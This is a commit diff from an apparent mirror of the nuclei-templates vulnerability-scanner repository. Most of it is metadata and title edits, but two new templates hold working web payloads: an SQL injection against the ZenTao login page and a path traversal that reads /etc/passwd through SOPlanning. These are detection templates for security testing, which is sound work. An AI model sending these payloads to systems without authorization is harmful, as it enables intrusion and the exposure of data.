daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into patch-1

patch-1
Prince Chaddha 2022-09-12 16:56:13 +05:30 committed by GitHub
parent 20a8a768d7 e1a6c0baa6
commit 86d7f1b84a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
520 changed files with 7600 additions and 4986 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

58
.new-additions
View File

@ -1,25 +1,33 @@
cves/2017/CVE-2017-11586.yaml
cves/2017/CVE-2017-11629.yaml
cves/2019/CVE-2019-14530.yaml
cves/2020/CVE-2020-17526.yaml
cves/2020/CVE-2020-5191.yaml
cves/2020/CVE-2020-5192.yaml
cves/2022/CVE-2022-2383.yaml
cves/2022/CVE-2022-32770.yaml
cves/2022/CVE-2022-32771.yaml
cves/2022/CVE-2022-32772.yaml
cves/2022/CVE-2022-34576.yaml
exposed-panels/adobe/aem-crx-package-manager.yaml
exposed-panels/adobe/aem-sling-login.yaml
exposed-panels/icc-pro-login.yaml
misconfiguration/aem/aem-crx-browser.yaml
misconfiguration/aem/aem-crx-namespace.yaml
misconfiguration/aem/aem-crx-search.yaml
misconfiguration/aem/aem-disk-usage.yaml
misconfiguration/aem/aem-explorer-nodetypes.yaml
misconfiguration/aem/aem-external-link-checker.yaml
misconfiguration/aem/aem-misc-admin.yaml
misconfiguration/aem/aem-offloading-browser.yaml
misconfiguration/aem/aem-security-users.yaml
misconfiguration/aem/aem-sling-userinfo.yaml
takeovers/uservoice-takeover.yaml
cnvd/2022/CNVD-2022-42853.yaml
cves/2014/CVE-2014-8676.yaml
cves/2015/CVE-2015-7245.yaml
cves/2018/CVE-2018-16139.yaml
cves/2020/CVE-2020-13258.yaml
cves/2021/CVE-2021-35380.yaml
cves/2021/CVE-2021-42663.yaml
cves/2021/CVE-2021-42667.yaml
cves/2022/CVE-2022-2376.yaml
cves/2022/CVE-2022-23854.yaml
cves/2022/CVE-2022-29004.yaml
cves/2022/CVE-2022-29005.yaml
cves/2022/CVE-2022-31474.yaml
cves/2022/CVE-2022-35405.yaml
cves/2022/CVE-2022-36642.yaml
cves/2022/CVE-2022-37299.yaml
default-logins/3com/3com-nj2000-default-login.yaml
exposed-panels/appsmith-web-login.yaml
exposed-panels/corebos-panel.yaml
exposed-panels/cvent-panel-detect.yaml
exposed-panels/omniampx-panel.yaml
exposed-panels/v2924-admin-panel.yaml
exposures/logs/redis-exception-error.yaml
exposures/logs/webalizer-xtended-stats.yaml
misconfiguration/aws-xray-application.yaml
misconfiguration/corebos-htaccess.yaml
misconfiguration/ec2-instance-information.yaml
misconfiguration/graphql/graphql-playground.yaml
misconfiguration/hivequeue-agent.yaml
misconfiguration/server-status.yaml
technologies/jhipster-detect.yaml
technologies/openssl-detect.yaml
vulnerabilities/videoxpert-lfi.yaml

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
| cve | 1414 | daffainfo | 630 | cves | 1389 | info | 1463 | http | 3823 |
| panel | 649 | dhiyaneshdk | 577 | exposed-panels | 656 | high | 1000 | file | 76 |
| edb | 557 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
| lfi | 500 | pdteam | 269 | technologies | 280 | critical | 475 | dns | 17 |
| xss | 486 | geeknik | 187 | exposures | 273 | low | 221 | | |
| wordpress | 417 | dwisiswant0 | 169 | misconfiguration | 231 | unknown | 10 | | |
| exposure | 404 | 0x_akoko | 162 | token-spray | 230 | | | | |
| cve2021 | 350 | princechaddha | 150 | workflows | 189 | | | | |
| rce | 335 | ritikchaddha | 135 | default-logins | 102 | | | | |
| wp-plugin | 314 | pussycat0x | 133 | file | 76 | | | | |
**294 directories, 4145 files**.
**295 directories, 4195 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

3751
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
| cve | 1414 | daffainfo | 630 | cves | 1389 | info | 1463 | http | 3823 |
| panel | 649 | dhiyaneshdk | 577 | exposed-panels | 656 | high | 1000 | file | 76 |
| edb | 557 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
| lfi | 500 | pdteam | 269 | technologies | 280 | critical | 475 | dns | 17 |
| xss | 486 | geeknik | 187 | exposures | 273 | low | 221 | | |
| wordpress | 417 | dwisiswant0 | 169 | misconfiguration | 231 | unknown | 10 | | |
| exposure | 404 | 0x_akoko | 162 | token-spray | 230 | | | | |
| cve2021 | 350 | princechaddha | 150 | workflows | 189 | | | | |
| rce | 335 | ritikchaddha | 135 | default-logins | 102 | | | | |
| wp-plugin | 314 | pussycat0x | 133 | file | 76 | | | | |

2
cnvd/2021/CNVD-2021-49104.yaml
View File

@ -13,7 +13,7 @@ info:
cvss-score: 9.9
cwe-id: CWE-434
remediation: Pan Wei has released an update to resolve this vulnerability.
tags: pan,micro,cnvd,cnvd2021
tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
requests:
- raw:

35
cnvd/2022/CNVD-2022-42853.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CNVD-2022-42853
info:
name: ZenTao CMS - SQL Injection
author: ling
severity: high
description: |
Zen Tao has a SQL injection vulnerability. Attackers can exploit the vulnerability to obtain sensitive database information.
reference:
- https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
metadata:
verified: true
shodan-query: http.title:"zentao"
fofa-query: "Zentao"
tags: cnvd,cnvd2022,zentao,sqli
variables:
num: "999999999"
requests:
- raw:
- |
POST /zentao/user-login.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/zentao/user-login.html
account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1
matchers:
- type: word
part: body
words:
- 'c8c605999f3d8352d7bb792cf3fdb25'

2
cves/2008/CVE-2008-1059.yaml
View File

@ -10,7 +10,7 @@ info:
- https://www.exploit-db.com/exploits/5194
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
- https://nvd.nist.gov/vuln/detail/CVE-2008-1059
- http://secunia.com/advisories/29099
- https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5

7
cves/2008/CVE-2008-1061.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2008-1061
info:
name: Wordpress Plugin Sniplets 1.2.2 - Cross-Site Scripting
name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: |
Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to (a) warning.php, (b) notice.php, and (c) inset.php in view/sniplets/, and possibly (d) modules/execute.php; the (2) url parameter to (e) view/admin/submenu.php; and the (3) page parameter to (f) view/admin/pager.php.
WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
reference:
- https://www.exploit-db.com/exploits/5194
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
@ -35,3 +35,6 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

2
cves/2011/CVE-2011-2744.yaml
View File

@ -7,8 +7,8 @@ info:
description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
reference:
- https://www.exploit-db.com/exploits/35945
- https://www.cvedetails.com/cve/CVE-2011-2744
- http://www.openwall.com/lists/oss-security/2011/07/13/6
- https://nvd.nist.gov/vuln/detail/CVE-2011-2744
- http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/
classification:
cve-id: CVE-2011-2744

2
cves/2011/CVE-2011-4618.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2011-4618
info:
name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting
name: Advanced Text Widget < 2.0.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.

2
cves/2011/CVE-2011-4624.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2011-4624
info:
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting
name: GRAND FlAGallery 1.57 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.

2
cves/2011/CVE-2011-4804.yaml
View File

@ -7,9 +7,9 @@ info:
description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/36598
- https://www.cvedetails.com/cve/CVE-2011-4804
- http://web.archive.org/web/20140802122115/http://secunia.com/advisories/46844/
- http://web.archive.org/web/20210121214308/https://www.securityfocus.com/bid/48944/
- https://nvd.nist.gov/vuln/detail/CVE-2011-4804
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2011-4804

2
cves/2011/CVE-2011-4926.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2011-4926
info:
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting
name: Adminimize 1.7.22 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.

2
cves/2011/CVE-2011-5106.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2011-5106
info:
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.

2
cves/2011/CVE-2011-5107.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2011-5107
info:
name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting
name: Alert Before Your Post <= 0.1.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.

2
cves/2011/CVE-2011-5179.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2011-5179
info:
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting
name: Skysa App Bar 1.04 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.

2
cves/2011/CVE-2011-5181.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2011-5181
info:
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting
name: ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.

2
cves/2011/CVE-2011-5265.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2011-5265
info:
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting
name: Featurific For WordPress 1.6.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.

2
cves/2012/CVE-2012-0896.yaml
View File

@ -7,9 +7,9 @@ info:
description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
reference:
- https://packetstormsecurity.com/files/108631/
- https://www.cvedetails.com/cve/CVE-2012-0896
- http://web.archive.org/web/20140804110141/http://secunia.com/advisories/47529/
- http://plugins.trac.wordpress.org/changeset/488883/count-per-day
- https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896
classification:
cve-id: CVE-2012-0896
metadata:

2
cves/2012/CVE-2012-0901.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2012-0901
info:
name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting
name: YouSayToo auto-publishing 1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.

2
cves/2012/CVE-2012-1835.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2012-1835
info:
name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting
name: WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.

2
cves/2012/CVE-2012-2371.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2012-2371
info:
name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting
name: WP-FaceThumb 0.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.

2
cves/2012/CVE-2012-4242.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2012-4242
info:
name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting
name: WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.

2
cves/2012/CVE-2012-4273.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2012-4273
info:
name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting
name: 2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.

2
cves/2012/CVE-2012-4768.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2012-4768
info:
name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting
name: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.

2
cves/2012/CVE-2012-4889.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2012-4889
info:
name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting
name: ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.

2
cves/2012/CVE-2012-5913.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2012-5913
info:
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting
name: WordPress Integrator 1.32 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.

2
cves/2013/CVE-2013-2287.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2013-2287
info:
name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting
name: WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.

2
cves/2013/CVE-2013-3526.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2013-3526
info:
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting
name: WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."

2
cves/2013/CVE-2013-4117.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2013-4117
info:
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.

2
cves/2013/CVE-2013-4625.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2013-4625
info:
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting
name: WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.

1
cves/2013/CVE-2013-5979.yaml
View File

@ -8,7 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/26955
- https://nvd.nist.gov/vuln/detail/CVE-2013-5979
- https://www.cvedetails.com/cve/CVE-2013-5979
- https://bugs.launchpad.net/xibo/+bug/1093967
classification:
cve-id: CVE-2013-5979

2
cves/2013/CVE-2013-6281.yaml
View File

@ -18,7 +18,7 @@ info:
cve-id: CVE-2013-6281
cwe-id: CWE-79
metadata:
google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet
google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet
verified: "true"
tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin

1
cves/2014/CVE-2014-10037.yaml
View File

@ -7,7 +7,6 @@ info:
description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
reference:
- https://www.exploit-db.com/exploits/30865
- https://www.cvedetails.com/cve/CVE-2014-10037
- https://nvd.nist.gov/vuln/detail/CVE-2014-10037
- http://www.exploit-db.com/exploits/30865
classification:

2
cves/2014/CVE-2014-4513.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4513
info:
name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting
name: ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.

4
cves/2014/CVE-2014-4535.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4535
info:
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
name: Import Legacy Media <= 0.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
@ -14,7 +14,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2014-4535
cwe-id: CWE-79
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
requests:
- method: GET

4
cves/2014/CVE-2014-4536.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4536
info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.
@ -17,7 +17,7 @@ info:
cwe-id: CWE-79
metadata:
google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
requests:
- method: GET

4
cves/2014/CVE-2014-4539.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4539
info:
name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting
name: Movies <= 0.6 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
@ -14,7 +14,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2014-4539
cwe-id: CWE-79
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth
requests:
- method: GET

4
cves/2014/CVE-2014-4544.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4544
info:
name: Podcast Channels < 0.28 - Unauthenticated Reflected Cross-Site Scripting
name: Podcast Channels < 0.28 - Cross-Site Scripting
author: daffainfo
severity: medium
description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.
@ -14,7 +14,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2014-4544
cwe-id: CWE-79
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
requests:
- method: GET

4
cves/2014/CVE-2014-4550.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4550
info:
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected Cross-Site Scripting
name: Shortcode Ninja <= 1.4 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter.
@ -16,7 +16,7 @@ info:
cwe-id: CWE-79
metadata:
google-query: inurl:"/wp-content/plugins/shortcode-ninja"
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth
requests:
- method: GET

4
cves/2014/CVE-2014-4558.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4558
info:
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected Cross-Site Scripting
name: WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.
@ -14,7 +14,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2014-4558
cwe-id: CWE-79
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth
requests:
- method: GET

4
cves/2014/CVE-2014-4561.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4561
info:
name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected Cross-Site Scripting
name: Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.
@ -14,7 +14,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2014-4561
cwe-id: CWE-79
tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan
tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth
requests:
- method: GET

4
cves/2014/CVE-2014-4592.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4592
info:
name: WP Planet <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
name: WP Planet <= 0.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.
@ -16,7 +16,7 @@ info:
cwe-id: CWE-79
metadata:
google-query: inurl:"/wp-content/plugins/wp-planet"
tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve
tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth
requests:
- method: GET

1
cves/2014/CVE-2014-5368.yaml
View File

@ -8,7 +8,6 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-5368
- https://www.exploit-db.com/exploits/39287
- https://www.cvedetails.com/cve/CVE-2014-5368
- http://seclists.org/oss-sec/2014/q3/417
classification:
cve-id: CVE-2014-5368

34
cves/2014/CVE-2014-8676.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2014-8676
info:
name: Simple Online Planning Tool 1.3.2 - Directory Traversal
author: 0x_Akoko
severity: medium
description: |
Directory traversal vulnerability in the file_get_contents function in SOPlanning 1.32 and earlier allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in a URL path parameter.
reference:
- https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2014-8676
- https://www.exploit-db.com/exploits/37604/
- http://seclists.org/fulldisclosure/2015/Jul/44
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2014-8676
cwe-id: CWE-22
tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

1
cves/2014/CVE-2014-8799.yaml
View File

@ -8,7 +8,6 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-8799
- https://www.exploit-db.com/exploits/35346
- https://www.cvedetails.com/cve/CVE-2014-8799
- https://wordpress.org/plugins/dukapress/changelog/
classification:
cve-id: CVE-2014-8799

2
cves/2014/CVE-2014-9094.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-9094
info:
